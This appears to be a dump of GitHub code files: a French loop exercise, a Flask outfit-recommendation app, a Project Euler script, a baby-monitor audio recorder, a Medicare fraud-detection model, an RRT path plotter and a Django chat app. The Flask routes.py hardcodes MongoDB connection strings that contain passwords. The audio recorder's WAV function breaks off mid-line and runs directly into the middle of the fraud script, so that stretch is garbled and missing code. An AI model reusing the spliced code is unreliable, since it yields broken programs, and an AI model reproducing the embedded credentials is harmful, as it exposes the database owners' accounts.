+{"seq_id":"12148215952","text":"'''\nCe que doit faire votre programme :\nIl y a 10 ingrédients et ils ont tous un prix au kilo différent : 9, 5, 12, 15, 7, 42, 13, 10, 1 et 20.\n\nVotre programme devra lire 10 entiers, le poids (en kilogrammes) qu'il faut acheter pour chaque ingrédient. Il devra calculer le coût total de ces achats.\n'''\n\nprix_kilo = [9, 5, 12, 15, 7, 42, 13, 10, 1, 20]\ncout_total = 0\n\nfor item in range(5):\n qty = int(input(\"Entrez le qty: \"))\n\n cout_total = cout_total + prix_kilo[item] * qty\nprint(cout_total)\n","repo_name":"vogtdale/python","sub_path":"franceIOI/Niveau2/DecouverteTableau/listeCourse.py","file_name":"listeCourse.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12671038969","text":"from app import app\nfrom flask import render_template, request, redirect, url_for, session, g, flash\nfrom werkzeug.urls import url_parse\nfrom app.forms import LoginForm, RegistrationForm, QuestionForm, FitForm\nfrom app.models import User, Questions\nfrom app import db\nfrom pymongo import MongoClient \nimport collections\n\n\ncluster=MongoClient(\"mongodb+srv://shopsussed:Sustainable6%24@cluster0.lzaplut.mongodb.net/test\")\nmongo_db = cluster[\"sussed\"]\ncollection = mongo_db[\"outfits\"]\n\nuserdata=MongoClient(\"mongodb+srv://shopsussed:6hpEtbWvUE2LyNRx@userdata.j61zh2s.mongodb.net/?retryWrites=true&w=majority\")\nuser=userdata[\"user\"]\ndata=user[\"data\"]\n\n\n@app.before_request\ndef before_request():\n g.user = None\n\n if 'user_id' in session:\n user = User.query.filter_by(id=session['user_id']).first()\n g.user = user\n\n@app.route('/')\ndef home():\n session['marks'] = ''\n return render_template('index.html', title='Home')\n\n@app.route(\"/nouser\")\ndef nouser():\n if not g.user:\n user = User.query.filter_by(username=\"anonymous\").first()\n if user is None:\n return redirect(url_for('login'))\n session['user_id'] = user.id\n session['marks'] = ''\n return redirect(url_for('findfit'))\n\n@app.route('/findfit', methods=['GET', 'POST'])\ndef findfit():\n session['marks'] = ''\n form = FitForm()\n if form.validate_on_submit():\n\n print(form.top.data)\n user = User.query.filter_by(username=g.user.username).first()\n print(form.gender.data.lower())\n if form.gender.data.lower() == 'male' or form.gender.data.lower()==\"female\":\n user.set_gender(form.gender.data)\n user.set_top(form.top.data)\n user.set_pants(form.pants.data)\n user.set_shoes(form.shoes.data)\n db.session.commit()\n print(g.user.pants)\n print(g.user.top)\n print(g.user.shoes)\n user_info ={ \"gender\": g.user.gender, \"pant-size\": g.user.pants, \"top-size\":g.user.top, \"shoe-size\": g.user.shoes}\n data.insert_one(user_info)\n session['marks'] = ''\n # next_page = request.args.get('next')\n # if not next_page or url_parse(next_page).netloc != '':\n # next_page = url_for('buildwardrobe')\n else:\n return redirect(url_for('findfit'))\n return redirect(url_for('buildwardrobe'))\n return render_template('findfit.html', title='Find Fit', form=form)\n\n@app.route('/buildwardrobe')\ndef buildwardrobe():\n print(g.user.gender)\n print(g.user.pants)\n print(g.user.top)\n print(g.user.shoes)\n session['marks'] = ''\n return render_template('buildwardrobe.html', title='Build Wardrobe')\n\n@app.route('/sussedstyle')\ndef sussedstyle():\n session['marks'] = ''\n if g.user.gender.lower() == 'male':\n return redirect(url_for('menquestion', id=1))\n if g.user.gender.lower() == \"female\":\n return redirect(url_for('womenquestion', id=1))\n return render_template('sussedstyle.html', title='Sussed Style')\n\n@app.route('/selectstyle')\ndef selectstyle():\n if g.user.gender==\"Male\":\n return redirect(url_for('menselectstyle'))\n elif g.user.gender==\"Female\":\n return redirect(url_for(\"womenselectstyle\"))\n\n@app.route('/menselectstyle')\ndef menselectstyle():\n return render_template(\"menselectstyle.html\", title=\"Select Style\")\n\n@app.route('/womenselectstyle')\ndef womenselectstyle():\n return render_template(\"womenselectstyle.html\", title=\"Select Style\")\n\n@app.route('/rooftop')\ndef rooftop():\n session['marks'] = 'r'\n return redirect(url_for('score'))\n\n@app.route('/old')\ndef old():\n session['marks'] = 'o'\n return redirect(url_for('score'))\n\n@app.route('/everyday')\ndef everyday():\n session['marks'] = 'e'\n return redirect(url_for('score'))\n\n@app.route('/summer')\ndef summer():\n session['marks'] = 's'\n return redirect(url_for('score'))\n\n@app.route('/streetwear')\ndef streetwear():\n session['marks'] = 'w'\n return redirect(url_for('score'))\n\n@app.route('/business')\ndef business():\n session['marks'] = 'b'\n return redirect(url_for('score'))\n\n@app.route('/casual')\ndef casual():\n session['marks'] = 'c'\n return redirect(url_for('score'))\n\n@app.route('/feminine')\ndef feminine():\n session['marks'] = 'f'\n return redirect(url_for('score'))\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n return redirect(url_for('login'))\n session['user_id'] = user.id\n session['marks'] = ''\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('home')\n return redirect(next_page)\n return redirect(url_for('home'))\n if g.user:\n return redirect(url_for('home'))\n return render_template('login.html', form=form, title='Login')\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n session['user_id'] = user.id\n session['marks'] = ''\n session['gender'] = ''\n return redirect(url_for('home'))\n if g.user:\n return redirect(url_for('home'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route('/menquestion/', methods=['GET', 'POST'])\ndef menquestion(id):\n form = QuestionForm()\n q = Questions.query.filter_by(q_id=id, c=\"men\").first()\n if not q:\n print(session['marks'])\n return redirect(url_for('score'))\n if request.method == 'POST':\n option = request.form['options']\n if \"everyday\" in option:\n session['marks'] += 'e'\n elif \"summer\" in option:\n session['marks'] += 's'\n elif \"old\" in option:\n session['marks'] += 'o'\n elif \"streetwear\" in option:\n session['marks'] += 'w'\n elif \"rooftop\" in option:\n session['marks'] +='r'\n print(option)\n return redirect(url_for('menquestion', id=(id+1)))\n form.options.choices = [(q.a, q.a), (q.b, q.b)]\n return render_template('question.html', form=form, q=q, title='Question {}'.format(id), percent=str(round((100/5)*(id-1),2)))\n\n@app.route('/womenquestion/', methods=['GET', 'POST'])\ndef womenquestion(id):\n form = QuestionForm()\n q = Questions.query.filter_by(q_id=id+10, c=\"women\").first()\n if not q:\n print(session['marks'])\n return redirect(url_for('score'))\n if request.method == 'POST':\n option = request.form['options']\n if \"business\" in option:\n session['marks'] += 'b'\n elif \"casual\" in option:\n session['marks'] += 'c'\n elif \"feminine\" in option:\n session['marks'] += 'f'\n print(option)\n return redirect(url_for('womenquestion', id=(id+1)))\n form.options.choices = [(q.a, q.a), (q.b, q.b)]\n return render_template('question.html', form=form, q=q, title='Question {}'.format(id), percent=str(round((100/9)*(id-1),2)))\n\n\n@app.route('/score')\ndef score():\n match1 = session['marks']\n outfits = []\n if match1!='':\n all_freq = {}\n for i in match1:\n if i in all_freq:\n all_freq[i] += 1\n else:\n all_freq[i] = 1\n res = max(all_freq, key = all_freq.get)\n if res=='e':\n text=\"Cozy/Comfortable\"\n elif res =='s':\n text=\"Night Out\"\n elif res == 'o':\n text = \"Keep it Cool\"\n elif res=='w':\n text=\"Streetwear\"\n elif res == 'r':\n text=\"Sophiscated/Dapper\"\n elif res=='b':\n text = \"Stay Ready/Business Chic\"\n elif res=='c':\n text = \"Easy Breezy Stylish/Casual Chic\"\n elif res=='f':\n text='For the Girlies/Feminine Chic'\n else:\n text=''\n result = collection.find({'type': res})\n for listing in result:\n outfit = []\n shirt_data = {}\n pants_data = {}\n accessories_data ={}\n jacket_data = {}\n shoes_data = {}\n for item in listing:\n if \"shirt\" in item:\n if listing[item]!='':\n if 'image' in item:\n shirt_data['image']=listing[item]\n elif 'name' in item:\n shirt_data['name'] = listing[item]\n else:\n shirt_data['link']=listing[item]\n if \"pants\" in item:\n if listing[item]!='':\n if 'image' in item:\n pants_data['image']=listing[item]\n elif 'name' in item:\n pants_data['name'] = listing[item]\n else:\n pants_data['link']=listing[item]\n if \"accessories\" in item:\n if listing[item]!='':\n if 'image' in item:\n accessories_data['image']=listing[item]\n elif 'name' in item:\n accessories_data['name'] = listing[item]\n else:\n accessories_data['link']=listing[item]\n if \"jacket\" in item:\n if listing[item]!='':\n if 'image' in item:\n jacket_data['image']=listing[item]\n elif 'name' in item:\n jacket_data['name'] = listing[item]\n else:\n jacket_data['link']=listing[item]\n if \"shoes\" in item:\n if listing[item]!='':\n if 'image' in item:\n shoes_data['image']=listing[item]\n elif 'name' in item:\n shoes_data['name'] = listing[item]\n else:\n shoes_data['link']=listing[item]\n if shirt_data != {}:\n outfit.append(shirt_data)\n if pants_data != {}:\n outfit.append(pants_data)\n if accessories_data != {}:\n outfit.append(accessories_data)\n if jacket_data != {}:\n outfit.append(jacket_data)\n if shoes_data != {}:\n outfit.append(shoes_data)\n outfits.append(outfit)\n return render_template('score.html', title='Final Score', outfits=outfits, text=text.upper())\n\n@app.route('/logout')\ndef logout():\n if not g.user:\n return redirect(url_for('login'))\n session.pop('user_id', None)\n session.pop('marks', None)\n return redirect(url_for('home'))\n","repo_name":"Serewaya/Sussed-Prototype","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26556824412","text":"import time\ndef combinationCount(n, r):\n return factorial(n) / (factorial(r) * factorial(n - r))\n\ndef factorial(n):\n fact = 1;\n if n == 0:\n return fact\n else:\n for i in range(1, n + 1):\n fact *= i\n return fact\nstart = time.time()\ncount = 0\nfor n in range(1, 101):\n for r in range(1, 101):\n if combinationCount(n,r) > 1000000:\n count += 1\nend = time.time()\nprint(count)\nprint(str(end - start) + \" seconds\")\n","repo_name":"taylordohmen/ProjectEuler","sub_path":"Euler53.py","file_name":"Euler53.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44315268226","text":"import pyaudio\nimport subprocess\nimport os\nimport time\nimport math\nimport struct\nimport threading\nimport numpy as np\nfrom collections import deque\n\nfrom BabyMonitor.lib import utils\n\nclass NoiseDetector(threading.Thread):\n\n def __init__(self, do_record=True, do_convert=True):\n threading.Thread.__init__(self)\n\n self.name = str(self.__class__.__name__)\n self.log_manager = utils.LogManager(self.name)\n\n self.media_dir = os.path.abspath(\"../media\")\n\n self.FORMAT = pyaudio.paFloat32\n self.RATE = 48000 # Hz, so samples (bytes) per second\n self.CHUNK_SIZE = 2048 # How many bytes to read from mic each time (stream.read())\n self.CHUNKS_PER_SEC = math.floor(self.RATE / self.CHUNK_SIZE) # How many chunks make a second? (16.000 bytes/s, each chunk is 1.024 bytes, so 1s is 15 chunks)\n self.CHANNELS = 1\n self.HISTORY_LENGTH = 2 # Seconds of audio cache for prepending to records to prevent chopped phrases (history length + observer length = min record length)\n\n self.audio = pyaudio.PyAudio()\n self.stream = self.get_stream()\n self.threshold = self.determine_threshold()\n self.chunk = None\n self.detect_noise = False\n\n self.record = []\n self.do_record = do_record\n self.do_convert = do_convert\n self.force_recording = False\n self.use_other_to_record = False\n self.saved = False\n\n self._value = 0.0\n\n self.current_file = \"\"\n self.last_file = \"\"\n self.deque_history = deque(maxlen=self.HISTORY_LENGTH * self.CHUNKS_PER_SEC)\n\n def __del__(self):\n self.stream.close()\n self.audio.terminate()\n\n def get_stream(self):\n return self.audio.open(format=self.FORMAT, channels=self.CHANNELS, rate=self.RATE, input=True, frames_per_buffer=self.CHUNK_SIZE)\n\n def determine_threshold(self):\n\n self.log_manager.log(\"Determining threshold...\")\n\n lst_res = []\n for x in range(50):\n block = self.stream.read(self.CHUNK_SIZE, exception_on_overflow=False)\n rms = self.get_rms(block)\n lst_res.append(rms)\n\n threshold = (sum(lst_res) / len(lst_res)) * 1.2\n\n self.log_manager.log(\"Setting threshold to: {0}\".format(threshold))\n\n return threshold\n\n def get_rms(self, block):\n \"\"\"\n Calculate Root Mean Square (noise level) for audio chunk\n\n @param bytes block\n @return float\n \"\"\"\n d = np.frombuffer(block, np.float32).astype(np.float)\n return np.sqrt((d * d).sum() / len(d))\n\n @property\n def value(self):\n return self._value if self._value > self.threshold else 0.0\n\n def start_recording(self):\n\n if not (self.use_other_to_record and self.current_file):\n self.current_file = os.path.join(self.media_dir, \".{0}.avi\".format(utils.get_timestamp()))\n\n if self.current_file:\n dst_dir = os.path.dirname(self.current_file)\n\n if not os.path.exists(dst_dir):\n os.makedirs(dst_dir)\n\n self.log_manager.log(\"Noise detected! Recording...\")\n\n def stop_recording(self):\n\n self.last_file = self.current_file\n\n self.record = []\n self.current_file = \"\"\n\n def is_recording(self):\n return len(self.record) > 0\n\n def get_chunk(self):\n return self.chunk\n\n def run(self):\n\n deque_observer = deque(maxlen=utils.OBSERVER_LENGTH * self.CHUNKS_PER_SEC)\n self.deque_history = deque(maxlen=self.HISTORY_LENGTH * self.CHUNKS_PER_SEC)\n\n self.log_manager.log(\"Listening...\")\n\n try:\n while True:\n self.chunk = self.stream.read(self.CHUNK_SIZE, exception_on_overflow=False)\n self.deque_history.append(self.chunk)\n\n rms = self.get_rms(self.chunk)\n deque_observer.append(rms)\n\n self._value = rms\n\n self.detect_noise = sum([x > self.threshold for x in deque_observer]) > 0\n if self.do_record:\n self.do_recording()\n\n pass\n except KeyboardInterrupt:\n self.log_manager.log(\"Interrupted!\")\n\n def do_recording(self):\n\n if (self.use_other_to_record and self.force_recording) or (not self.use_other_to_record and self.detect_noise):\n if not self.is_recording():\n\n self.start_recording()\n\n self.record.append(self.chunk)\n\n elif self.is_recording():\n # self.save(list(self.deque_history) + self.record)\n self.save(self.record)\n\n self.log_manager.log(\"Listening...\")\n\n self.stop_recording()\n\n def save(self, data):\n\n self.log_manager.log(\"Saving audio...\")\n self.saved = False\n if self.current_file:\n data = b''.join(data)\n\n with open(self.current_file, \"wb+\") as f:\n f.write(self.generate_wav(data))\n\n if self.do_convert:\n self.convert_to_mp3(self.current_file)\n\n self.saved = True\n\n def convert_to_mp3(self, file_path=\"\"):\n\n self.log_manager.log(\"Converting audio...\")\n\n try:\n mp3_file = \"{0}.mp3\".format(os.path.splitext(file_path)[0])\n\n lst_cmd = []\n lst_cmd.append(\"ffmpeg\")\n lst_cmd.append(\"-i {}\".format(file_path))\n lst_cmd.append(\"-f mp3\")\n lst_cmd.append(\"{}\".format(mp3_file))\n\n p = subprocess.Popen(\" \".join(lst_cmd), shell=True)\n (output, err) = p.communicate()\n\n if os.path.exists(file_path):\n p.wait()\n os.remove(file_path)\n\n self.current_file = mp3_file\n\n except subprocess.CalledProcessError:\n self.log_manager.log(\"Error converting audio\")\n\n def bytes_to_array(self, bytes, type):\n \"\"\"\n Convert raw audio data to TypedArray\n\n @param bytes bytes\n @return numpy-Array\n \"\"\"\n return np.frombuffer(bytes, dtype=type)\n\n def generate_wav(self, raw):\n \"\"\"\n Create WAVE-file from raw audio chunks\n\n @param bytes raw\n @return bytes\n \"\"\"\n # Check if input format is supported\n if self.FORMAT not in (pyaudio.paFloat32, pyaudio.paInt16):\n print(\"Unsupported format\")\n return\n\n # Convert raw audio bytes to typed array\n samples = self.bytes_to_array(raw, np.float32)\n\n # Get sample size\n sample_size = pyaudio.get_sample_size(self.FORMAT)\n\n # Get data-length\n byte_count = (len(samples)) * sample_size\n\n # Get bits/sample\n bits_per_sample = sample_size * 8\n\n # Calculate frame-size\n frame_size = int(self.CHANNELS * ((bits_per_sample + 7) / 8))\n\n # Container for WAVE-content\n wav = bytearray()\n\n # Start RIFF-Header\n wav.extend(struct.pack('2) & (len(fraud_1)>2) :\r\n tt = ttest_ind(fraud_0, fraud_1)\r\n re_drug_tt[(drugx, colx)] = tt\r\n\r\n\r\n\r\n#Setting Probabilities\r\nProb_005 = [(key, p) for (key, (t, p)) in re_drug_tt.items() if p <=0.05]\r\nprint(len(Prob_005))\r\n\r\ninx=100\r\ndrug_name = Prob_005[inx][0][0]\r\nprint(drug_name)\r\ndf_bar = pd.concat([partD_drug_All_Group.get_group((Prob_005[inx][0][0],0.0)), partD_drug_All_Group.get_group((Prob_005[inx][0][0],1.0))])\r\ndf_bar.head()\r\n\r\nFeature_DrugWeighted = []\r\nnew_col_all = []\r\nfor i, p005x in enumerate(Prob_005):\r\n # if i>4:\r\n # break\r\n drug_name = p005x[0][0]\r\n cat_name = p005x[0][1]\r\n\r\n new_col = drug_name + '_' + cat_name\r\n new_col_all.append(new_col)\r\n\r\n drug_0 = partD_drug_All_Group.get_group((drug_name, 0.0))[['npi', cat_name]]\r\n drug_1 = partD_drug_All_Group.get_group((drug_name, 1.0))[['npi', cat_name]]\r\n\r\n drug_01 = pd.concat([drug_0, drug_1])\r\n drug_01.rename(columns={cat_name: new_col}, inplace=True)\r\n Feature_DrugWeighted.append(drug_01)\r\n\r\nnpi_col = Final[['npi']]\r\n\r\nw_npi = []\r\n\r\nfor n, nx in enumerate(Feature_DrugWeighted):\r\n nggx = pd.merge(npi_col, nx.drop_duplicates(['npi']), on='npi', how='left')\r\n\r\n w_npi.append(nggx)\r\n\r\nFinal1 = Final\r\n\r\nfor wx in w_npi:\r\n col_n = wx.columns[1]\r\n Final1[col_n] = wx[col_n].values\r\n\r\nwx = w_npi[0]\r\nwx.columns[1]\r\ncol_n = wx.columns[1]\r\n\r\nlen(wx[col_n].values)\r\nFinal1.fillna(0)\r\n\r\nnew_col_all\r\n\r\nprint(Final1[new_col_all].describe())\r\n\r\nFinal1['drug_mean'] = Final1[new_col_all].mean(axis=1)\r\n\r\n\r\nFinal['drug_mean'] = Final['drug_mean'].map(lambda x: np.log10(x + 1.0))\r\n\r\nFinal1['drug_sum'] = Final1[new_col_all].sum(axis=1)\r\nFinal['drug_sum'] = Final['drug_sum'].map(lambda x: np.log10(x + 1.0))\r\n\r\nFinal1['drug_variance'] = Final1[new_col_all].var(axis=1)\r\n\r\ndf_train, df_valid = train_test_split(Final1, test_size=0.3)\r\n\r\ndf_train.fillna(0)\r\ndf_valid.fillna(0)\r\n\r\n#Create the Specialty Weight\r\nspec_dict =[]\r\nspec_fraud_1 = df_train[df_train['is_fraud']==1]['Specialty']\r\n\r\nfrom collections import Counter\r\ncounts = Counter(spec_fraud_1)\r\nspec_dict = dict(counts)\r\n\r\nFinal1['Spec_Weight'] = Final1['Specialty'].map(lambda x: spec_dict.get(x, 0))\r\n\r\ndf_train, df_valid = train_test_split(Final1, test_size=0.3)\r\n\r\nnumerical_features1 = numerical_features + ['drug_sum','Spec_Weight']\r\n\r\nimport seaborn as sns\r\n\r\n# Default heatmap\r\n# Calculate correlation between each pair of variable\r\ncorr_matrix = df_train.corr()\r\n\r\n# Draw the heatmap with the mask\r\n#sns.heatmap(corr_matrix)\r\n\r\nX= df_train[numerical_features1].values\r\nY = df_train['is_fraud'].values\r\n\r\nparams_0 = {'n_estimators': 300, 'max_depth': 6, 'min_samples_split': 3, 'learning_rate': 0.01}\r\nparams_1 = {'n_estimators': 500, 'max_depth': 10, 'min_samples_split': 5, 'class_weight': {0: 1, 1: 2000}, 'n_jobs': 5}\r\n\r\nscaler = StandardScaler()\r\n\r\nclfs = [\r\n LogisticRegression(C=1e5, class_weight={0: 1, 1: 2000}, n_jobs=5),\r\n\r\n GaussianNB(),\r\n\r\n RandomForestClassifier(**params_1),\r\n\r\n GradientBoostingClassifier(**params_0)\r\n\r\n]\r\n\r\nX_train = df_train[numerical_features1].values\r\n\r\ny_train = df_train['is_fraud'].values\r\n\r\nX_train = scaler.fit_transform(X_train)\r\n\r\nX_valid = df_valid[numerical_features1].values\r\ny_valid = df_valid['is_fraud'].values\r\nX_valid_x = scaler.transform(X_valid)\r\n\r\nprob_result = []\r\ndf_m = []\r\nclfs_fited = []\r\nfor clf in clfs:\r\n print(\"%s:\" % clf.__class__.__name__)\r\n clf.fit(X_train,y_train)\r\n clfs_fited.append(clf)\r\n y_pred = clf.predict(X_valid_x)\r\n prob_pos = clf.predict_proba(X_valid_x)[:, 1]\r\n prob_result.append(prob_pos)\r\n m = confusion_matrix(y_valid, y_pred)\r\n clf_score = brier_score_loss(y_valid, prob_pos, pos_label=y_valid.max())\r\n print(\"\\tBrier: %1.5f\" % (clf_score))\r\n print(\"\\tPrecision: %1.5f\" % precision_score(y_valid, y_pred))\r\n print(\"\\tRecall: %1.5f\" % recall_score(y_valid, y_pred))\r\n print(\"\\tF1: %1.5f\" % f1_score(y_valid, y_pred))\r\n print(\"\\tauc: %1.5f\" % roc_auc_score(y_valid, prob_pos))\r\n print(\"\\tAccuracy: %1.5f\\n\" % accuracy_score(y_valid, y_pred))\r\n df_m.append(\r\n pd.DataFrame(m, index=['True Negative', 'True Positive'], columns=['Pred. Negative', 'Pred. Positive'])\r\n )\r\n\r\n\r\nfpr, tpr, thresholds = roc_curve(y_valid, prob_result[2])\r\n\r\nfpr, tpr, thresholds = roc_curve(y_valid, prob_result[2])\r\nroc_auc = auc(fpr, tpr)\r\nplt.plot(fpr, tpr, lw=1, label='ROC (area = %0.2f)' % roc_auc)\r\nplt.xlim([-0.05, 1.05])\r\nplt.ylim([-0.05, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic')\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n\r\nprint(m)\r\n\r\ny_pred = clf.predict(X_valid_x)\r\n\r\nfeature_importance = clfs_fited[2].feature_importances_\r\n# make importance relative to max importance\r\nfeature_importance = 100.0 * (feature_importance / feature_importance.max())\r\nsorted_idx = np.argsort(feature_importance)\r\n\r\nfeatures = [numerical_features1[ix] for ix in sorted_idx]\r\nbardata = {\"name\":features[::-1], \"importance percent\":feature_importance[sorted_idx][::-1]}\r\n\r\nplt.figure()\r\n\r\n# Create plot title\r\nplt.title(\"Feature Importance\")\r\n\r\n# Add bars\r\nplt.bar(range(X.shape[1]), feature_importance[sorted_idx])\r\n\r\n# Add feature names as x-axis labels\r\nplt.xticks(range(X.shape[1]), features, rotation=90)\r\n\r\n# Show plot\r\nplt.show()","repo_name":"sklal/DATS6501","sub_path":"FeatureEngineering_Model.py","file_name":"FeatureEngineering_Model.py","file_ext":"py","file_size_in_byte":10485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29164895079","text":"import csv\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nnodeList = list()\noptimalPath = list()\nobstacleList = list()\nnodeListFile = 'nodesSampled_RRTstar.csv'\noptimalPathFile = 'optimalPath_RRTstar.csv'\nobstacleFile = 'obstacles.csv'\n\nenvironmentFile = 'environment.csv'\n\nwith open(nodeListFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n for row in csv_reader:\n nodeList.append((float(row[0]), float(row[1])));\n\nwith open(optimalPathFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n for row in csv_reader:\n optimalPath.append((float(row[0]),float(row[1])));\n\nwith open(obstacleFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n for row in csv_reader:\n obstacleList.append((float(row[0]),float(row[1]),float(row[2]),float(row[3])))\n\n\nwith open(environmentFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n N_line = 0\n for row in csv_reader:\n if N_line == 0:\n x_env = float(row[0])\n y_env = float(row[1])\n elif N_line == 1:\n x_start = float(row[0])\n y_start = float(row[1])\n elif N_line == 2:\n x_goal_TL = float(row[0])\n y_goal_TL = float(row[1])\n dx_goal = float(row[2])\n dy_goal = float(row[3])\n N_line += 1\n\nx_nodeList, y_nodeList = zip(*nodeList)\n\nx_optimalPath, y_optimalPath = zip(*optimalPath)\n\n#figure size\nplt.figure(figsize=(16,16))\n# plot optimal path\nplt.plot(x_optimalPath,y_optimalPath,'b-*',linewidth=3)\n\n# plot sampled nodes\nplt.plot(x_nodeList,y_nodeList,'r.')\n\n# plot start point\nplt.plot(x_start,y_start,'g.', markersize=30)\n\n# plot goal region\nrect_goal = plt.Rectangle((x_goal_TL,y_goal_TL-dy_goal),dx_goal,dy_goal,color = 'g',alpha=0.3)\nplt.gca().add_patch(rect_goal)\n\n#plot obstacles\nfor ob in obstacleList:\n rect = plt.Rectangle((ob[0],ob[1]-ob[3]),ob[2],ob[3],color='r',alpha=0.3)\n plt.gca().add_patch(rect)\n #plt.add_patch(rect)\n# plt.plot((ob[0],ob[0]+ob[2]),(ob[1],ob[1]),'r-')\n# plt.plot((ob[0]+ob[2], ob[0]+ob[2]),(ob[1],ob[1]-ob[3]),'r-')\n# plt.plot((ob[0],ob[0]),(ob[1],ob[1]-ob[3]),'r-')\n# plt.plot((ob[0],ob[0]+ob[2]),(ob[1]-ob[3],ob[1]-ob[3]),'r-')\n\nplt.xticks(np.arange(0,x_env,step=10))\nplt.yticks(np.arange(0,y_env,step=10))\nplt.show()\n","repo_name":"stumpyx13/PathPlanning","sub_path":"postProcessTest.py","file_name":"postProcessTest.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17393137660","text":"import datetime\nimport json\nimport requests\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse\nfrom rest_framework.decorators import api_view \nfrom rest_framework import viewsets\nfrom .models import Message\nfrom .serializer import LanguageSerializer, MessageSerializer\n\n\n# Create your views here.\ndef home(request):\n \"\"\"\n renders home Screen\n :param:\n :return: \n \"\"\"\n return render(request, 'chatRoomPage/home.html')\n\n\nclass LanguageView(viewsets.ModelViewSet): \n '''\n Legacy Code\n :param: Django prebuilt ViewSet\n :return: \n '''\n queryset = Message.objects.all()\n serializer_class = LanguageSerializer\n\n\ndef chatView(request):\n \"\"\"\n Displays Chat Screen and saves the new chat messages that the user enters. \n :param: Request Object\n :return: \n \"\"\"\n sender = request.session['sender']\n receiver = request.session['receiver']\n\n totalMessages = Message.objects.filter(sender = receiver)\n messageList = []\n messagesList1 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '0'\n }\n messageList.append(data)\n \n totalMessages = Message.objects.filter(sender = sender)\n messagesList2 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '1'\n }\n messageList.append(data)\n messageList = sorted(messageList, key = lambda k: k['time'])\n\n context = {\n 'messagesList': messageList,\n 'sender': sender,\n 'receiver': receiver\n }\n\n if request.method == \"POST\":\n message = request.POST.get('messageBox') # response['message']\n res = Message(sender=sender, receiver=receiver, message=message, time= datetime.datetime.now())\n res.save()\n\n totalMessages = Message.objects.filter(sender = receiver)\n messageList = []\n messagesList1 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '0'\n }\n messageList.append(data)\n \n totalMessages = Message.objects.filter(sender = sender)\n messagesList2 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '1'\n }\n messageList.append(data)\n messageList = sorted(messageList, key = lambda k: k['time'])\n\n context = {\n 'messagesList': messageList,\n 'sender': sender,\n 'receiver': receiver\n }\n return render(request, 'chatRoomPage/chatRoom.html', context)\n\n return render(request, 'chatRoomPage/chatRoom.html', context)\n\n\ndef loginView(request):\n \"\"\"\n Displays Login Screen and moves the user to chat View screen.\n Currently we support only two users.\n :param: Request Object\n :return: \n \"\"\"\n if(request.method == \"POST\"):\n\n sender = request.POST.get('Username')\n if(sender == 'kate'):\n receiver = 'john'\n else:\n receiver = 'kate'\n \n request.session.set_test_cookie()\n request.session ['sender'] = sender\n request.session ['receiver'] = receiver\n \n request.method = 'GET'\n totalMessages = Message.objects.filter(sender = sender)\n messagesList1 = []\n messagesList = []\n\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '1'\n }\n messagesList.append(data)\n\n totalMessages = Message.objects.filter(sender = receiver)\n messagesList2 = []\n\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '0'\n }\n messagesList.append(data)\n messagesList = sorted(messagesList, key = lambda k: k['time'])\n\n context = {\n 'messagesList': messagesList,\n 'sender': sender,\n 'receiver': receiver\n }\n return render(request, 'chatRoomPage/chatRoom.html', context)\n\n return render(request, 'loginScreen/login.html')\n\n\n\"\"\"\n@api_view(['GET', 'POST'])\ndef getMessageView(request): \n '''\n Get Message API\n Legacy Code\n '''\n response = json.loads(request.body.decode('utf-8'))\n sender = response['sender']\n receiver = response['receiver']\n res = Message.objects.filter(sender=sender, receiver=receiver).values()\n messageList = []\n for i in res:\n print(i)\n print(i['message'])\n messageList.append(i['message'])\n\n return JsonResponse({'message': messageList})\n\n\n@api_view(['GET', 'POST'])\ndef sendMessageView(request): \n '''\n Get Message API\n Legacy code\n '''\n sender = 'user1'\n receiver = 'user2'\n message = '' # response['message']\n res = Message(sender=sender, receiver=receiver, message=message)\n res.save()\n return render(request, 'blogPage/chatRoom.html')\n # queryset = Message.objects.all()\n # serializer_class = MessageSerializer\n\"\"\"","repo_name":"jainilparikh/django-Chat-app","sub_path":"chatRoomPage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22682140420","text":"import os\n\nUSE_GOB = False\n\nSOURCE_ROOT = os.path.dirname(os.path.abspath(__file__))\nSOURCE_ROOT = os.path.realpath(os.path.join(SOURCE_ROOT, '..', '..'))\nCROSUTILS_DIR = os.path.join(SOURCE_ROOT, 